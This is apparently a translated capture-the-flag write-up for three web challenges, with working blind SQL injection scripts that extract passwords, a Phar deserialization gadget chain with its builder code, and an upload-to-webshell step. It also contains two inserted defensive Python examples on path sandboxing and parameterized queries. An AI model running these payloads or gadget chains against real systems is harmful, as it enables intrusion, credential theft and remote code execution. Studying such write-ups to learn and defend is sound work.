web | BUU Practice Write-ups - web

[NCTF2019]SQLi
Visiting robots.txt reveals a hint:

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['passwd'] === admin's password,Then you will get the flag;

Far too much is filtered, even the single quote. However, a backslash (\) can still be used to escape the closing quote. Checking the PHP version (screenshot) shows that %00 truncation is available, so the approach is clear.
First, trigger a correct response (screenshot): the page echoes "welcome", so that string serves as the boolean oracle.
REGEXP string matching supports regular expressions.

The core statement of the script is:
data = {'username': '\\', 'passwd': "||/**/passwd/**/regexp/**/\"^{}\"; {}".format((password + j), parse.unquote('%00'))}

The script:
import requests
import string
from urllib import parse

charset = string.ascii_lowercase + string.digits + '_'
url = 'http://0c034adc-a4d9-4fe6-98f2-5ca68f2effe9.node4.buuoj.cn:81/index.php'
password = ''
for i in range(50):
    for j in charset:
        # the '\' in username escapes the closing quote, so passwd becomes SQL;
        # REGEXP "^prefix" tests the next character and %00 truncates the rest
        data = {'username': '\\', 'passwd': "||/**/passwd/**/regexp/**/\"^{}\"; {}".format((password + j), parse.unquote('%00'))}
        res = requests.post(url=url, data=data)
        if 'welcome' in res.text:
            password += j
            print(password)
            break

(screenshot)

Then submit the password to get the flag (screenshot).

Reading a more experienced player's write-up: if "" had also been filtered here, hex encoding could be used to bypass it.

[CISCN2019 华北赛区 Day1 Web1]Dropbox
First register an arbitrary account and log in.
After uploading a file, there is a download function -> arbitrary file download.
Capture the request with Burp (screenshot). It looks promising.
Trying index.php reports that the file does not exist, so change the path; in the end ../../index.php exists.
index.php (only the tail of the file survived extraction):
$a->Name();
$a->Size();
?>

class.php
<?php
class User {
    // ... the start of the class (through the constructor) was lost in extraction;
    // the constructor ends by storing the database handle:
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1; ");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?); ");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?; ");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    // $db is never type-checked: whatever object ends up here gets close() called on it
    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);
        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);
        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    // any undefined method name is forwarded to every File and the result recorded
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    // renders the recorded results as an HTML table (tag markup simplified)
    public function __destruct() {
        $table = '<table>';
        $table .= '<tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th>' . htmlentities($func) . '</th>';
        }
        $table .= '<th>Opt</th>';
        $table .= '</tr>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td>' . htmlentities($value) . '</td>';
            }
            $table .= '<td>下载 / 删除</td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        // file_exists() goes through PHP's stream wrappers, phar:// included
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>
delete.php (the head of the file, where $filename and $file are set up, was lost in extraction):
if ($file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

Here we find:
public function close() { return file_get_contents($this->filename); }

$this->filename is controllable, so try to construct a call to this method:
$a = new User();
$a->db = new File();
$a->db->filename = '/flag.txt';

But constructed like this the file contents are never echoed, so take an indirect route.
Let $this->db = new FileList() instead: User::__destruct calls $this->db->close(), FileList has no close(), so __call() runs and invokes close() on each File and records the result; FileList::__destruct then prints the collected results.
The construction is as follows:
<?php
// minimal copies of the User and FileList classes from class.php;
// only the properties matter for serialization
class User {
    public $db;
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct() {
        $this->files = array(new File());
        $this->results = array();
        $this->funcs = array();
    }
}

class File {
    public $filename = '/flag.txt';
}

$a = new User();
$a->db = new FileList();

$phar = new Phar("myphar.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub (Phar requires it to end with __HALT_COMPILER())
$phar->setMetadata($a); // store the custom object as meta-data in the manifest
$phar->addFromString("exp.txt", "test"); // add the file to be archived
// the signature is computed automatically
$phar->stopBuffering();
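The entry point of this chain is a file name that reaches file_exists()/unlink()/file_get_contents() unchecked: a traversal path gets the download endpoint to serve ../../index.php, and a phar:// prefix gets file_exists() to deserialize the archive's metadata. The following is an added example, not code from the challenge or this write-up: a Python model of the check the Dropbox app lacks before File::open(), download and delete. It rejects stream-wrapper prefixes, path separators and traversal components, and confirms the resolved path stays inside the user's sandbox directory. The function name, sandbox path and sample names are assumptions.

```python
import os
import re
from typing import Dict, Iterable, Optional

# Anything that looks like a URL scheme prefix ("phar:", "php:", "file:", ...).
# PHP filesystem functions such as file_exists() and unlink() honour these
# stream wrappers, and phar:// is what makes Phar metadata deserialize.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def resolve_user_file(sandbox: str, name: str) -> Optional[str]:
    """Map a user-supplied file name onto the user's sandbox directory.

    Returns the absolute path to use, or None when the name must be rejected.
    Hypothetical helper written for this example.
    """
    if not name or SCHEME_RE.match(name):
        return None  # stream-wrapper prefix such as phar:// or php://
    if name in (".", "..") or "/" in name or "\\" in name or "\0" in name:
        return None  # path separators or traversal components
    base = os.path.realpath(sandbox)
    full = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(full) != base:
        return None  # resolves outside the sandbox (e.g. through a symlink)
    return full


def classify(sandbox: str, names: Iterable[str]) -> Dict[str, str]:
    """Map each candidate name to 'ok' or 'rejected'."""
    return {n: ("ok" if resolve_user_file(sandbox, n) else "rejected") for n in names}


if __name__ == "__main__":
    # Constructed inputs: a normal upload name, the write-up's traversal path,
    # and a phar:// reference of the kind that triggers metadata deserialization.
    samples = ["note.txt", "../../index.php", "phar://uploads/myphar.phar/exp.txt"]
    for n, verdict in classify("/var/www/sandbox/alice", samples).items():
        print(f"{verdict:8} {n}")
```

The scheme check matters even though "/" is already rejected: `phar:` alone would still be handed to the wrapper layer, and the dirname comparison after realpath() catches the cases a string filter cannot, such as an uploaded symlink pointing out of the sandbox. Closing the User::__destruct gadget (type-checking $db before calling close() on it) is a separate fix in the PHP classes themselves.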

(screenshot)

[CISCN2019 总决赛 Day2 Web1]Easyweb
The usual routine: view the page source and visit robots.txt.
The source contains something that looks like an injection point (screenshot).

User-agent: *
Disallow: *.php.bak

Following another write-up, visit
image.php.bak
to get the source.

So try injecting.
Entering \0: addslashes() turns it into \\0, the subsequent filter strips \0 and leaves a lone \, which escapes the closing ' and achieves the bypass (screenshot).
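Both injections in this write-up come down to the same root cause: SQL assembled by string concatenation. In the NCTF challenge a bare backslash in username escapes the closing quote; here addslashes() followed by stripping the text \0 leaves a dangling backslash that does the same. The following Python is an added example, not code from either challenge or from this write-up: it models addslashes() and the \0 strip, shows that the result ends in an unpaired backslash so the quote that follows is no longer a terminator, and contrasts that with a parameterized query (SQLite standing in for the challenge's MySQL) that treats the same input as data. The table, column names and sample row are constructed for the example.

```python
import sqlite3
from typing import List


def addslashes(value: str) -> str:
    """Python model of PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def legacy_sanitize(value: str) -> str:
    """The fragile pipeline from the write-up: escape first, then strip the
    two-character text '\\0'. For the input '\\0' this leaves a lone backslash."""
    return addslashes(value).replace("\\0", "")


def closing_quote_escaped(escaped_value: str) -> bool:
    """True when the value ends in an odd run of backslashes: under MySQL string
    rules the quote that follows is then part of the literal, not its terminator."""
    trailing = len(escaped_value) - len(escaped_value.rstrip("\\"))
    return trailing % 2 == 1


def build_query_legacy(id_value: str, path_value: str) -> str:
    """Concatenation-style query over a constructed images(id, path) table."""
    return ("SELECT path FROM images WHERE id='%s' OR path='%s'"
            % (legacy_sanitize(id_value), legacy_sanitize(path_value)))


def make_db() -> sqlite3.Connection:
    """In-memory sample table, constructed for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id TEXT, path TEXT)")
    conn.execute("INSERT INTO images VALUES ('1', 'dog.jpg')")
    return conn


def lookup_safe(conn: sqlite3.Connection, id_value: str, path_value: str) -> List[str]:
    """Parameterized form: the driver sends values separately from the SQL text,
    so no escaping trick in the input can change the query's shape."""
    rows = conn.execute("SELECT path FROM images WHERE id=? OR path=?",
                        (id_value, path_value)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    # The write-up's id=\0 case: the "sanitized" value is a single backslash, so
    # the quote meant to close id='...' is escaped and the path value becomes SQL.
    print(build_query_legacy("\\0", "or 1=1#"))
    print(closing_quote_escaped(legacy_sanitize("\\0")))   # True
    conn = make_db()
    print(lookup_safe(conn, "1", ""))            # ['dog.jpg']
    print(lookup_safe(conn, "\\0", "or 1=1#"))   # []
```

closing_quote_escaped() only diagnoses the symptom; the fix is the parameter binding in lookup_safe(), which is exactly what class.php already does for the users table with mysqli prepare()/bind_param(). Blacklists like the NCTF one and escape-then-filter chains like this one both fail because they try to make data safe inside the SQL text instead of keeping it out of the text altogether.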

This can be exploited with:
# payload = 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url + payload)
# print(requests.get(url + payload).text)

When the condition is true the response contains JFIF.
Try dumping the database name:
import requests

# username=123&password=Password
url = 'http://d80bf902-c46b-46a9-82d1-c6da6e8bfb01.node4.buuoj.cn:81/image.php?id=\\0&path='
# JFIF
# payload = 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url + payload)
# print(requests.get(url + payload).text)
#
result = ''
i = 0
while True:
    i = i + 1
    # binary search over printable ASCII for the i-th character
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        payload = f'or ascii(substr(database()/**/from/**/{i}/**/for/**/1))>{mid}%23'
        r = requests.get(url + payload)
        if "JFIF" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
print(result)

The database is:
ciscnfinal

Dump the table names:
payload = f'or ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))/**/from/**/{i}/**/for/**/1))>{mid}%23'

(screenshot)

This gives the table name. Now dump the password directly:
payload = f'or ascii(substr((select/**/(password)from(users))/**/from/**/{i}/**/for/**/1))>{mid}%23'

(screenshot)

This gives the password (screenshot).

There is a file upload, so upload something (screenshot).

Upload an arbitrary file; the page it is served at looks like this (screenshot):

The filename turns up in the log.
PHP files can't be uploaded here (php is presumably filtered), so use a short tag to bypass it.
Filename:

Connect with AntSword (蚁剑) to get the flag (screenshot).
